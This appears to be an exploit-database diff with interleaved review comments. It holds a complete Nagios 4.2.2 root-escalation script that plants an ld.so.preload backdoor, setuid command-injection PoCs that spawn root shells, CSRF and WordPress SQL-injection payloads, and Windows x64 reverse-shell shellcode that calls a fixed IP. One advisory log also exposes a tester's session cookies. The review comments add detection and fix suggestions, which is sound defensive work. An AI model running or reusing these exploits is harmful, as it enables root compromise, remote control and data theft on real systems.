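Review bot: The 40790.txt write-up stops at the crash log and gives a defender nothing to look for, although both indicators are already in its text. I would add a closing line along the lines of `Detection: requests to /unauth/php/errorPage.php whose code parameter is not a short integer, and appweb3 aborting with the glibc double-free message shown above.` Next to the `mprItoa` prototype it would also help to say in one sentence that the terminator lands one byte past the `size` the caller passed, so a caller handing over its full buffer length is off by one; that is how I read the third paragraph, so it should be confirmed against the appweb3 source before it is stated as fact.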
@@ -0,0 +1,192 @@ +Affected Product: Nagios 4 +Vulnerability Type: root privilege escalation +Fixed in Version: N/A +Vendor Website: https://www.nagios.com/ +Software Link: : https://sourceforge.net/projects/nagios/files/latest/download?source=directory-featured +Affected Version: 4.2.2 and prior +Tested on: Ubuntu +Remote Exploitable: No +Reported to vendor: 8 november 2016 +Disclosed to public: +Release mode: Responsible Disclosure +CVE-2016-8641 Nagios 4.2.2 - root privilege escalation +Credits: Vincent Malguy + + +Description (from wikipedia) : +Nagios /ˈnɑːɡiːoʊs/, now known as Nagios Core, is a free and open source computer-software application that monitors systems, networks and infrastructure. Nagios offers monitoring and alerting services for servers, switches, applications and services. It alerts users when things go wrong and alerts them a second time when the problem has been resolved. + +********************* CVE-2016-8641 Nagios 4.2.2 - root privilege escalation ********************* +Using official installation instruction at https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/4/en/quickstart-ubuntu.html, +nagios' user is create with a shell : + +Create a new nagios user account and give it a password. +/usr/sbin/useradd -m -s /bin/bash nagios + +leading to a entry in /etc/passwd like this "nagios:x:1001:1001::/home/nagios:/bin/bash" + +This means that if someone has access to the nagios account, he can access any files own by nagios. + +The Nagios startup script, run by root, is insecurely giving owner of file to nagios use : +(/etc/init.d/nagios: line 190) +touch $NagiosRunFile +chown $NagiosUser:$NagiosGroup $NagiosRunFile $NagiosVarDir/nagios.log $NagiosRetentionFile + +If Nagios user symlink $NagiosRunFile to a file that he has no access to, at startup or reboot of the nagios daemon, the init script with give him ownership of the linked file. 
+ + +Exploit : +#!/bin/bash -p +# + + + +TARGETSERVICE="Nagios" +LOWUSER="nagios" +TARGETPATH="/usr/local/nagios/var/nagios.lock" + +BACKDOORSH="/bin/bash" +BACKDOORPATH="/tmp/rootbackdoor" +PRIVESCLIB="/tmp/privesclib.so" +PRIVESCSRC="/tmp/privesclib.c" +SUIDBIN="/usr/bin/sudo" + +function cleanexit { +# Cleanup +echo -e "\n[+] Cleaning up..." +rm -f $PRIVESCSRC +rm -f $PRIVESCLIB +rm -f $TARGETPATH +touch $TARGETPATH +if [ -f /etc/ld.so.preload ]; then +echo -n > /etc/ld.so.preload +fi +echo -e "\n[+] Job done. Exiting with code $1 \n" +exit $1 +} + +function ctrl_c() { + echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." +cleanexit 0 +} + +#intro +echo -e "\033[94m \nNagios - Root Privilege Escalation PoC Exploit \nNagios-chowned.sh (ver. 1.0)\n\nCVE-2016-XXXX \n" +echo -e "Discovered by: Vincent Malguy\n Original exploit code borrow from Dawid Golunski http://legalhackers.com (Thanks!)\033[0m" + + +# Priv check + +echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m" +id | grep -q ${LOWUSER} +if [ $? -ne 0 ]; then +echo -e "\n[!] You need to execute the exploit as ${LOWUSER} user! Exiting.\n" +exit 3 +fi + + +echo -e "\n[+] Target ${LOWUSER} file set to $TARGETPATH " + +# [ Active exploitation ] + +trap ctrl_c INT +# Compile privesc preload library +echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" +cat <<_solibeof_>$PRIVESCSRC +#define _GNU_SOURCE +#include +#include +#include +#include + #include + #include + #include + +uid_t geteuid(void) { +static uid_t (*old_geteuid)(); +old_geteuid = dlsym(RTLD_NEXT, "geteuid"); +if ( old_geteuid() == 0 ) { +chown("$BACKDOORPATH", 0, 0); +chmod("$BACKDOORPATH", 04777); +//unlink("/etc/ld.so.preload"); +} +return old_geteuid(); +} +_solibeof_ +/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" +if [ $? -ne 0 ]; then +echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." 
+cleanexit 2; +fi + + +# Prepare backdoor shell +cp $BACKDOORSH $BACKDOORPATH +echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" + +# Safety check +if [ -f /etc/ld.so.preload ]; then +echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." +exit 2 +fi + +# Symlink the log file to /etc +rm -f $TARGETPATH && ln -s /etc/ld.so.preload $TARGETPATH +if [ $? -ne 0 ]; then +echo -e "\n[!] Couldn't remove the $TARGETPATH file or create a symlink." +cleanexit 3 +fi +echo -e "\n[+] Symlink created at: \n`ls -l $TARGETPATH`" + +# Kill target service if possible +#echo -ne "\n[+] Killing ${TARGETSERVICE}...\n" +#killall ${TARGETSERVICE} + + + +# Wait for target service startup to re-create target file +echo -ne "\n[+] Waiting for ${TARGETSERVICE} startup to re-create the ${TARGETPATH}...\n" + +while :; do +# if target file can be recreated by target process (like logs files), we need to keep remove and link it +rm -f $TARGETPATH && ln -s /etc/ld.so.preload $TARGETPATH +sleep 0.1 +if [ -f /etc/ld.so.preload ]; then +echo $PRIVESCLIB > /etc/ld.so.preload +rm -f $TARGETPATH +break; +fi +done + +# /etc/ld.so.preload dir should be owned by our low priv controled user at this point +# Inject the privesc.so shared library to escalate privileges +echo $PRIVESCLIB > /etc/ld.so.preload +echo -e "\n[+] ${TARGETSERVICE} restarted. The /etc/ld.so.preload file got created with ${LOWUSER} privileges: \n`ls -l /etc/ld.so.preload`" +echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" +echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" +chmod 755 /etc/ld.so.preload + +# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) +echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" +sudo 2>/dev/null >/dev/null + + +# Check for the rootshell +ls -l $BACKDOORPATH +ls -l $BACKDOORPATH | grep rws | grep -q root +if [ $? 
-eq 0 ]; then +echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" +echo -e "\n\033[94mGot root! The ${TARGETSERVICE} server has been ch-OWNED !\033[0m" +else +echo -e "\n[!] Failed to get root" +cleanexit 2 +fi + + +# Execute the rootshell +echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n" +$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" +$BACKDOORPATH -p + +# Job done. +cleanexit 0 diff --git a/platforms/linux/local/40788.txt b/platforms/linux/local/40788.txt new file mode 100755 index 000000000..4c9a23b66 --- /dev/null +++ b/platforms/linux/local/40788.txt @@ -0,0 +1,20 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912 + +The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script: + +$ ls -l /usr/local/bin/root_trace +-rwsr-xr-x 1 root root 12376 Oct 17 2014 /usr/local/bin/root_trace + +As the environment is not scrubbed, you can just do something like this: + +$ cat /tmp/sysd.py +import os +os.system("id") +os._exit(0); + +$ PYTHONPATH=/tmp root_trace +uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin) + +This was fixed by PAN: + +http://securityadvisories.paloaltonetworks.com/Home/Detail/67 \ No newline at end of file diff --git a/platforms/linux/local/40789.txt b/platforms/linux/local/40789.txt new file mode 100755 index 000000000..417a9343a --- /dev/null +++ b/platforms/linux/local/40789.txt 
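Review bot: The 40774.sh header says `Fixed in Version: N/A` and the text never tells an administrator how to close the hole, even though the root cause is quoted from the init script: root runs `chown $NagiosUser:$NagiosGroup $NagiosRunFile ...` on a path the nagios account can apparently replace, and chown follows the symlink. I would add a remediation line such as `Mitigation: use chown -h in /etc/init.d/nagios, or create the run file as the nagios user instead of chowning it as root.` A post-incident check belongs there too: whether /etc/ld.so.preload exists and is owned by a non-root account. The banner inside the script still prints `CVE-2016-XXXX` while the header gives CVE-2016-8641, and the two should agree.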
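Review bot: Neither 40788.txt nor the following 40789.txt names the root cause the two reports share, which is a setuid-root binary calling `system()` with the caller's environment left intact, so that `PYTHONPATH`, `SHELLOPTS` and `PS4` are honoured by the process it starts. I would add one sentence to each file saying that filtering the argument, as the earlier root_reboot fix described in 40789.txt did, cannot close this, and that the durable fix is an `execve()` call with a fixed argv and an explicitly built minimal environment. The reconstructed C in 40789.txt also shows `fprintf(stderr, "%s: Can't setuid to reboot system\n");` with no argument for `%s`; since it is presented as the vendor's logic, that is worth a remark in the text.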
@@ -0,0 +1,44 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=913
+This was fixed by PAN: http://securityadvisories.paloaltonetworks.com/Home/Detail/67
+
+The root_reboot utility is setuid root, but performs multiple calls to system() with attacker controlled data, such as this one:
+
+.text:0804870F C7 44 24 04 78+ mov dword ptr [esp+4], offset aUsrLocalBinPan ; "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 "...
+.text:08048717 89 04 24 mov [esp], eax ; char **
+.text:0804871A E8 0D FE FF FF call _asprintf
+.text:0804871F 8B 45 E8 mov eax, [ebp+new]
+.text:08048722 85 C0 test eax, eax
+.text:08048724 0F 84 B9 01 00+ jz loc_80488E3
+.text:0804872A 89 04 24 mov [esp], eax ; command
+.text:0804872D E8 9A FD FF FF call _system
+
+Which is trying to do this:
+
+ if (setuid(0) < 0)
+ {
+ fprintf(stderr, "%s: Can't setuid to reboot system\n");
+ }
+ if (reason) {
+ asprintf(&new, "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 -m \"The system is shutting down due to %s.\"", reason);
+ system(new);
+ free(new);
+ }
+
+This is trivially exploitable, for example:
+
+
+$ ls -l /usr/local/bin/root_reboot
+-rwsr-xr-x 1 root root 16275 Oct 17 2014 /usr/local/bin/root_reboot
+$ root_reboot --restart '"; bash -i; echo "'
+# id
+uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
+
+Palo Alto pointed out that they had already fixed this bug in an update that I needed to apply:
+
+https://securityadvisories.paloaltonetworks.com/Home/Detail/45
+
+However, looking at the fix they had essentially just checked that each character in the "reason" parameter was alphanumeric or white space. This does not prevent exploitation, you can just do this:
+
+$ env SHELLOPTS=xtrace PS4='$(id)' root_reboot --restart whatever
+uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
+
diff --git a/platforms/php/webapps/40776.txt b/platforms/php/webapps/40776.txt
new file mode 100755
index 000000000..820422387
--- /dev/null
+++ b/platforms/php/webapps/40776.txt
@@ -0,0 +1,146 @@ +Document Title: +=============== +EditMe CMS - CSRF Privilege Escalate Web Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=1996 + + +Release Date: +============= +2016-11-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1996 + + +Common Vulnerability Scoring System: +==================================== +2.8 + + +Product & Service Introduction: +=============================== +EditMe is a framework that serves as a Platform as a Service to build custom Web Applications, Web Prototyping,and Web CMS. +CMS in which any page can be a server side script that implements whatever dynamic functionality you dream up. That's EditMe. No FTP servers, compilers or IDEs required. EditMe's API uses server-side JavaScript and our templates use XML, so there are no new languages to lear. + +(Copy of the Vendor Homepage: http://www.editme.com/ ) + + +Abstract Advisory Information: +============================== +An independent vulnerability laboratory researcher discovered a csrf privilege escalate web vulnerability in the official EditMe content managament system. + + +Vulnerability Disclosure Timeline: +================================== +2016-11-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +A cross site request forgery vulnerability has been discovered in the official EditMe content managament system. +The vulnerability allows to perform malicious client-side web-application requests to execute non-protected functions +with own web context. + +In the absence of security token, an attacker could execute arbitrary code in the administrators browser to gain +unauthorized access to the administrator access privileges. 
+ + +Proof of Concept (PoC): +======================= +Cross site request forgery web vulnerability can be exploited by malicious web application without privileged user account and without user interaction. +To demonstrate safety or reproduce csrf web vulnerability information and follow the steps below to continue provided. + + +--- PoC: CSRF Exploitation --- + +

Privilege Escalate CSRF Vulnerability

+
+ + + + + + + + +
+ + + +--- PoC Session Logs [POST]--- +Status: 200 [OK] +Host: pentest.editme.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: __utma=164978144.641387690.1478254033.1478262268.1478328738.3; __utmz=164978144.1478328738.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); km_lv=x; km_ai=i3E6P9IiO690CMxX353C5RCJAVY%3D; km_uq=; __utma=1.330307796.1478254213.1478254213.1478329355.2; __utmz=1.1478254213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=164978144.3.10.1478328738; __utmc=164978144; JSESSIONID=377D65CA3361D7998A1173C97420C846; visited=" Home 404"; __utmb=1.24.10.1478329355; __utmc=1; __utmt=1; editme-user=admin; editme-key="ECiu7PBk57GYeaLPUxHeDw==" +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 153 +- +POST Method: mode=AdminAdd&redirect=&user-groupname=A&user-username=VulnerabilityLab&user-password=1234&user-password2=1234&user-email=tested%40live.fr®Submit=Save + + + +Security Risk: +============== +The security rsik of the client-side cross site request forgery web vulnerability in the application is estimated as medium. (CVSS 2.8) + + +Credits & Authors: +================== +ZwX - (http://zwx.fr/) )[http://www.vulnerability-lab.com/show.php?user=ZwX] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, +including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-Lab or its suppliers are not liable in any case of damage, +including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised +of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing +limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically +redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or +its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific +authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission. + + Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com + + 
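Review bot: The PoC session log reproduces the tester's full Cookie header, including the `JSESSIONID`, `editme-user` and `editme-key` values for pentest.editme.com. Those are session credentials and should be replaced with a placeholder such as `Cookie: [redacted]` before the file is archived. The advisory also has no remediation section: for a state-changing `mode=AdminAdd` POST the expected control is a per-session anti-CSRF token verified server-side, with SameSite cookies as defence in depth. Separately, "without user interaction" in the PoC paragraph is at odds with CSRF, which depends on a logged-in administrator loading the attacker's page, so the wording overstates the exposure.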
diff --git a/platforms/php/webapps/40782.txt b/platforms/php/webapps/40782.txt
new file mode 100755
index 000000000..ee71168c6
--- /dev/null
+++ b/platforms/php/webapps/40782.txt
@@ -0,0 +1,27 @@
+# Exploit Title: BBS e-Franchise 1.1.1 Plugin of WordPress – Sql Injection
+# Date: 12/11/2016
+# Exploit Author: Lenon Leite
+# Vendor Homepage: https://wordpress.org/plugins/bbs-e-franchise/
+# Software Link: https://wordpress.org/plugins/bbs-e-franchise/
+# Contact: http://twitter.com/lenonleite
+# Website: http://lenonleite.com.br/
+# Category: webapps
+# Version: 1.1.1
+# Tested on: Windows 8.1
+
+1 - Description:
+
+$_GET[‘uid’] is not escaped. Url is accessible for any user.
+I will have find post or page that usage plugin, that use shortcode
+
+http://lenonleite.com.br/en/blog/2016/11/18/bbs-e-franchise-1-1-1-plugin-of-wordpress-sql-injection/
+
+
+2 - Proof of Concept:
+
+http://target/2016/09/26/ola-mundo-2/?uid=0+UNION+SELECT+1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,slug,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+wp_terms+WHERE+term_id=1
+
+
+3 - Timeline:
+12/11/2016 - Discovered
+12/11/2016 - vendor not found
\ No newline at end of file
diff --git a/platforms/php/webapps/40783.txt b/platforms/php/webapps/40783.txt
new file mode 100755
index 000000000..172d6b361
--- /dev/null
+++ b/platforms/php/webapps/40783.txt
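Review bot: The description names the unescaped parameter (`$_GET['uid']`) but not the file or query that consumes it, and it gives no fix, so a site owner cannot tell from this entry what to patch or filter. 40783.txt in the next hunk has the same gap for `$_POST['selectedCategory']` in `UpdateCategoryList()`. A line such as `Fix: cast the parameter to an integer (if it is numeric, as uid=0 in the PoC suggests) or bind it with $wpdb->prepare() before it reaches the query` would make both entries usable for remediation. The timeline's "vendor not found" suggests no patched release existed at the time, which the entries could say outright so readers know to disable the plugin rather than wait for an update.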
@@ -0,0 +1,35 @@ +# Exploit Title: Product Catalog 8 1.2 Plugin WordPress – Sql Injection +# Date: 12/11/2016 +# Exploit Author: Lenon Leite +# Vendor Homepage: https://wordpress.org/plugins/product-catalog-8/ +# Software Link: https://wordpress.org/plugins/product-catalog-8/ +# Contact: http://twitter.com/lenonleite +# Website: http://lenonleite.com.br/ +# Category: webapps +# Version: 1.2 +# Tested on: Windows 8.1 + +1 - Description: + +$_POST[ ‘selectedCategory’ ] is not escaped. +UpdateCategoryList() is accessible for any user. + +http://lenonleite.com.br/en/blog/2016/11/18/product-catalog-8-plugin-wordpress-sql-injection/ + +2 - Proof of Concept: + +
+ + + +
+ +3 - Timeline: + +12/11/2016 - Discovered +12/11/2016 - vendor not found + +-- +Atenciosamente + +Lenon Leite diff --git a/platforms/win_x86-64/shellcode/40781.c b/platforms/win_x86-64/shellcode/40781.c new file mode 100755 index 000000000..9ddb29aef --- /dev/null +++ b/platforms/win_x86-64/shellcode/40781.c 
@@ -0,0 +1,658 @@ +/* + # Title : Windows x64 Reverse Shell TCP shellcode + # size : 694 bytes + # Author: Roziul Hasan Khan Shifat + # Date : 10-11-2016 + # Tested on : Windows 7 x64 Professional + # Email : shifath12@gmail.com +*/ + + +/* + + + + + +Disassembly of section .text: + +0000000000000000 : + 0: 48 31 d2 xor %rdx,%rdx + 3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax + 8: 48 8b 70 18 mov 0x18(%rax),%rsi + c: 48 8b 76 10 mov 0x10(%rsi),%rsi + 10: 48 ad lods %ds:(%rsi),%rax + 12: 48 8b 30 mov (%rax),%rsi + 15: 48 8b 7e 30 mov 0x30(%rsi),%rdi + 19: b2 88 mov $0x88,%dl + 1b: 8b 5f 3c mov 0x3c(%rdi),%ebx + 1e: 48 01 fb add %rdi,%rbx + 21: 8b 1c 13 mov (%rbx,%rdx,1),%ebx + 24: 48 01 fb add %rdi,%rbx + 27: 44 8b 73 1c mov 0x1c(%rbx),%r14d + 2b: 49 01 fe add %rdi,%r14 + 2e: 66 ba fc 0c mov $0xcfc,%dx + 32: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx + 36: 48 01 fb add %rdi,%rbx + 39: 48 31 d2 xor %rdx,%rdx + 3c: 52 push %rdx + 3d: 52 push %rdx + 3e: c7 04 24 77 73 32 5f movl $0x5f327377,(%rsp) + 45: c7 44 24 04 33 32 2e movl $0x642e3233,0x4(%rsp) + 4c: 64 + 4d: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp) + 54: 48 8d 0c 24 lea (%rsp),%rcx + 58: 48 83 ec 58 sub $0x58,%rsp + 5c: ff d3 callq *%rbx + 5e: 48 83 c4 68 add $0x68,%rsp + 62: 48 89 c6 mov %rax,%rsi + 65: 48 31 db xor %rbx,%rbx + 68: 48 31 d2 xor %rdx,%rdx + 6b: b2 88 mov $0x88,%dl + 6d: 8b 5e 3c mov 0x3c(%rsi),%ebx + 70: 48 01 f3 add %rsi,%rbx + 73: 8b 1c 13 mov (%rbx,%rdx,1),%ebx + 76: 48 01 f3 add %rsi,%rbx + 79: 44 8b 7b 1c mov 0x1c(%rbx),%r15d + 7d: 49 01 f7 add %rsi,%r15 + 80: 48 31 d2 xor %rdx,%rdx + 83: 66 ba c8 01 mov $0x1c8,%dx + 87: 41 8b 1c 17 mov (%r15,%rdx,1),%ebx + 8b: 48 01 f3 add %rsi,%rbx + 8e: 66 ba 98 01 mov $0x198,%dx + 92: 48 29 d4 sub %rdx,%rsp + 95: 48 8d 14 24 lea (%rsp),%rdx + 99: 48 31 c9 xor %rcx,%rcx + 9c: 66 b9 02 02 mov $0x202,%cx + a0: 48 83 ec 58 sub $0x58,%rsp + a4: ff d3 callq *%rbx + a6: 48 31 d2 xor %rdx,%rdx + a9: 48 83 ec 58 sub $0x58,%rsp + ad: 48 89 54 24 20 mov %rdx,0x20(%rsp) + 
b2: 48 89 54 24 28 mov %rdx,0x28(%rsp) + b7: 48 ff c2 inc %rdx + ba: 48 89 d1 mov %rdx,%rcx + bd: 48 ff c1 inc %rcx + c0: 4d 31 c0 xor %r8,%r8 + c3: 49 83 c0 06 add $0x6,%r8 + c7: 4d 31 c9 xor %r9,%r9 + ca: 66 41 b9 88 01 mov $0x188,%r9w + cf: 43 8b 1c 0f mov (%r15,%r9,1),%ebx + d3: 48 01 f3 add %rsi,%rbx + d6: 4d 31 c9 xor %r9,%r9 + d9: ff d3 callq *%rbx + db: 49 89 c5 mov %rax,%r13 + de: 4d 31 c0 xor %r8,%r8 + e1: 41 50 push %r8 + e3: 41 50 push %r8 + e5: c6 04 24 02 movb $0x2,(%rsp) + e9: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%rsp) + f0: c7 44 24 04 c0 a8 0a movl $0x800aa8c0,0x4(%rsp) + f7: 80 + f8: 4c 8d 24 24 lea (%rsp),%r12 + fc: 48 83 ec 58 sub $0x58,%rsp + +0000000000000100 : + 100: 48 31 db xor %rbx,%rbx + 103: 41 8b 5f 0c mov 0xc(%r15),%ebx + 107: 48 01 f3 add %rsi,%rbx + 10a: 4c 89 e2 mov %r12,%rdx + 10d: 4c 89 e9 mov %r13,%rcx + 110: 41 b0 10 mov $0x10,%r8b + 113: ff d3 callq *%rbx + 115: 4d 31 c0 xor %r8,%r8 + 118: 4c 39 c0 cmp %r8,%rax + 11b: 75 e3 jne 100 + 11d: 48 31 db xor %rbx,%rbx + 120: 41 8b 5e 40 mov 0x40(%r14),%ebx + 124: 48 01 fb add %rdi,%rbx + 127: ff d3 callq *%rbx + 129: 48 31 d2 xor %rdx,%rdx + 12c: 52 push %rdx + 12d: 52 push %rdx + 12e: c7 04 24 75 73 65 72 movl $0x72657375,(%rsp) + 135: c7 44 24 04 33 32 2e movl $0x642e3233,0x4(%rsp) + 13c: 64 + 13d: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp) + 144: 48 8d 0c 24 lea (%rsp),%rcx + 148: 66 ba fc 0c mov $0xcfc,%dx + 14c: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx + 150: 48 01 fb add %rdi,%rbx + 153: 48 83 ec 58 sub $0x58,%rsp + 157: ff d3 callq *%rbx + 159: 48 89 c6 mov %rax,%rsi + 15c: 48 31 db xor %rbx,%rbx + 15f: 48 31 d2 xor %rdx,%rdx + 162: 66 ba 4a 02 mov $0x24a,%dx + 166: 45 8b 24 96 mov (%r14,%rdx,4),%r12d + 16a: 49 01 fc add %rdi,%r12 + 16d: 48 31 c9 xor %rcx,%rcx + 170: 51 push %rcx + 171: 51 push %rcx + 172: c7 04 24 46 69 6e 64 movl $0x646e6946,(%rsp) + 179: c7 44 24 04 57 69 6e movl $0x646e6957,0x4(%rsp) + 180: 64 + 181: c7 44 24 08 6f 77 41 movl $0x4141776f,0x8(%rsp) + 188: 41 + 
189: 80 74 24 0b 41 xorb $0x41,0xb(%rsp) + 18e: 48 8d 14 24 lea (%rsp),%rdx + 192: 48 89 f1 mov %rsi,%rcx + 195: 48 83 ec 58 sub $0x58,%rsp + 199: 41 ff d4 callq *%r12 + 19c: 48 31 d2 xor %rdx,%rdx + 19f: 52 push %rdx + 1a0: 52 push %rdx + 1a1: 52 push %rdx + 1a2: c7 04 24 43 6f 6e 73 movl $0x736e6f43,(%rsp) + 1a9: c7 44 24 04 6f 6c 65 movl $0x57656c6f,0x4(%rsp) + 1b0: 57 + 1b1: c7 44 24 08 69 6e 64 movl $0x6f646e69,0x8(%rsp) + 1b8: 6f + 1b9: c7 44 24 0c 77 43 6c movl $0x616c4377,0xc(%rsp) + 1c0: 61 + 1c1: 66 c7 44 24 10 73 73 movw $0x7373,0x10(%rsp) + 1c8: 48 8d 0c 24 lea (%rsp),%rcx + 1cc: 48 83 ec 58 sub $0x58,%rsp + 1d0: ff d0 callq *%rax + 1d2: 49 89 c7 mov %rax,%r15 + 1d5: 48 31 d2 xor %rdx,%rdx + 1d8: 48 31 c9 xor %rcx,%rcx + 1db: 51 push %rcx + 1dc: 51 push %rcx + 1dd: c7 04 24 53 68 6f 77 movl $0x776f6853,(%rsp) + 1e4: c7 44 24 04 57 69 6e movl $0x646e6957,0x4(%rsp) + 1eb: 64 + 1ec: 66 c7 44 24 08 6f 77 movw $0x776f,0x8(%rsp) + 1f3: 48 8d 14 24 lea (%rsp),%rdx + 1f7: 48 89 f1 mov %rsi,%rcx + 1fa: 48 83 ec 58 sub $0x58,%rsp + 1fe: 41 ff d4 callq *%r12 + 201: 4c 89 f9 mov %r15,%rcx + 204: 48 31 d2 xor %rdx,%rdx + 207: 48 83 ec 58 sub $0x58,%rsp + 20b: ff d0 callq *%rax + 20d: 66 ba 90 02 mov $0x290,%dx + 211: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx + 215: 48 01 fb add %rdi,%rbx + 218: 48 83 ec 68 sub $0x68,%rsp + 21c: 48 83 ec 18 sub $0x18,%rsp + 220: 4c 8d 24 24 lea (%rsp),%r12 + 224: b2 68 mov $0x68,%dl + 226: 48 31 c9 xor %rcx,%rcx + 229: 41 89 14 24 mov %edx,(%r12) + 22d: 49 89 4c 24 04 mov %rcx,0x4(%r12) + 232: 49 89 4c 24 0c mov %rcx,0xc(%r12) + 237: 49 89 4c 24 14 mov %rcx,0x14(%r12) + 23c: 49 89 4c 24 18 mov %rcx,0x18(%r12) + 241: 48 31 d2 xor %rdx,%rdx + 244: b2 ff mov $0xff,%dl + 246: 48 ff c2 inc %rdx + 249: 41 89 54 24 3c mov %edx,0x3c(%r12) + 24e: 4d 89 6c 24 50 mov %r13,0x50(%r12) + 253: 4d 89 6c 24 58 mov %r13,0x58(%r12) + 258: 4d 89 6c 24 60 mov %r13,0x60(%r12) + 25d: 68 63 6d 64 41 pushq $0x41646d63 + 262: 88 54 24 03 mov %dl,0x3(%rsp) + 266: 48 
8d 14 24 lea (%rsp),%rdx + 26a: 48 ff c1 inc %rcx + 26d: 48 83 ec 58 sub $0x58,%rsp + 271: 48 89 4c 24 20 mov %rcx,0x20(%rsp) + 276: 48 31 c9 xor %rcx,%rcx + 279: 4d 31 c0 xor %r8,%r8 + 27c: 4c 89 44 24 28 mov %r8,0x28(%rsp) + 281: 4c 89 44 24 30 mov %r8,0x30(%rsp) + 286: 4c 89 44 24 38 mov %r8,0x38(%rsp) + 28b: 4d 8d 0c 24 lea (%r12),%r9 + 28f: 4c 89 4c 24 40 mov %r9,0x40(%rsp) + 294: 4d 8d 4c 24 68 lea 0x68(%r12),%r9 + 299: 4c 89 4c 24 48 mov %r9,0x48(%rsp) + 29e: 4d 31 c9 xor %r9,%r9 + 2a1: ff d3 callq *%rbx + 2a3: 48 31 d2 xor %rdx,%rdx + 2a6: 66 ba a0 04 mov $0x4a0,%dx + 2aa: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx + 2ae: 48 01 fb add %rdi,%rbx + 2b1: 48 31 c9 xor %rcx,%rcx + 2b4: ff d3 callq *%rbx + + + + + + + +*/ + + + + +/* + +section .text + global s +s: + +xor rdx,rdx +mov rax,[gs:rdx+0x60] +mov rsi,[rax+0x18] +mov rsi,[rsi+0x10] +lodsq +mov rsi,[rax] +mov rdi,[rsi+0x30] + +;-------------------------------- +mov dl,0x88 +mov ebx,[rdi+0x3c] +add rbx,rdi +mov ebx,[rbx+rdx] +add rbx,rdi ;IMAGE_EXPORT_DIRECTORY + + +mov r14d,[rbx+0x1c] +add r14,rdi ;kernel32.dll AddressOfFunctions + + +;----------------------- +;loading ws2_32.dll + +mov dx,831*4 +mov ebx,[r14+rdx] +add rbx,rdi ;LoadLibraryA() + +xor rdx,rdx +push rdx +push rdx + +mov [rsp],dword 'ws2_' +mov [rsp+4],dword '32.d' +mov [rsp+8],word 'll' + + +lea rcx,[rsp] + +sub rsp,88 + +call rbx + +add rsp,104 + +mov rsi,rax ;ws2_32.dll base address +;-------------------------------------- +xor rbx,rbx 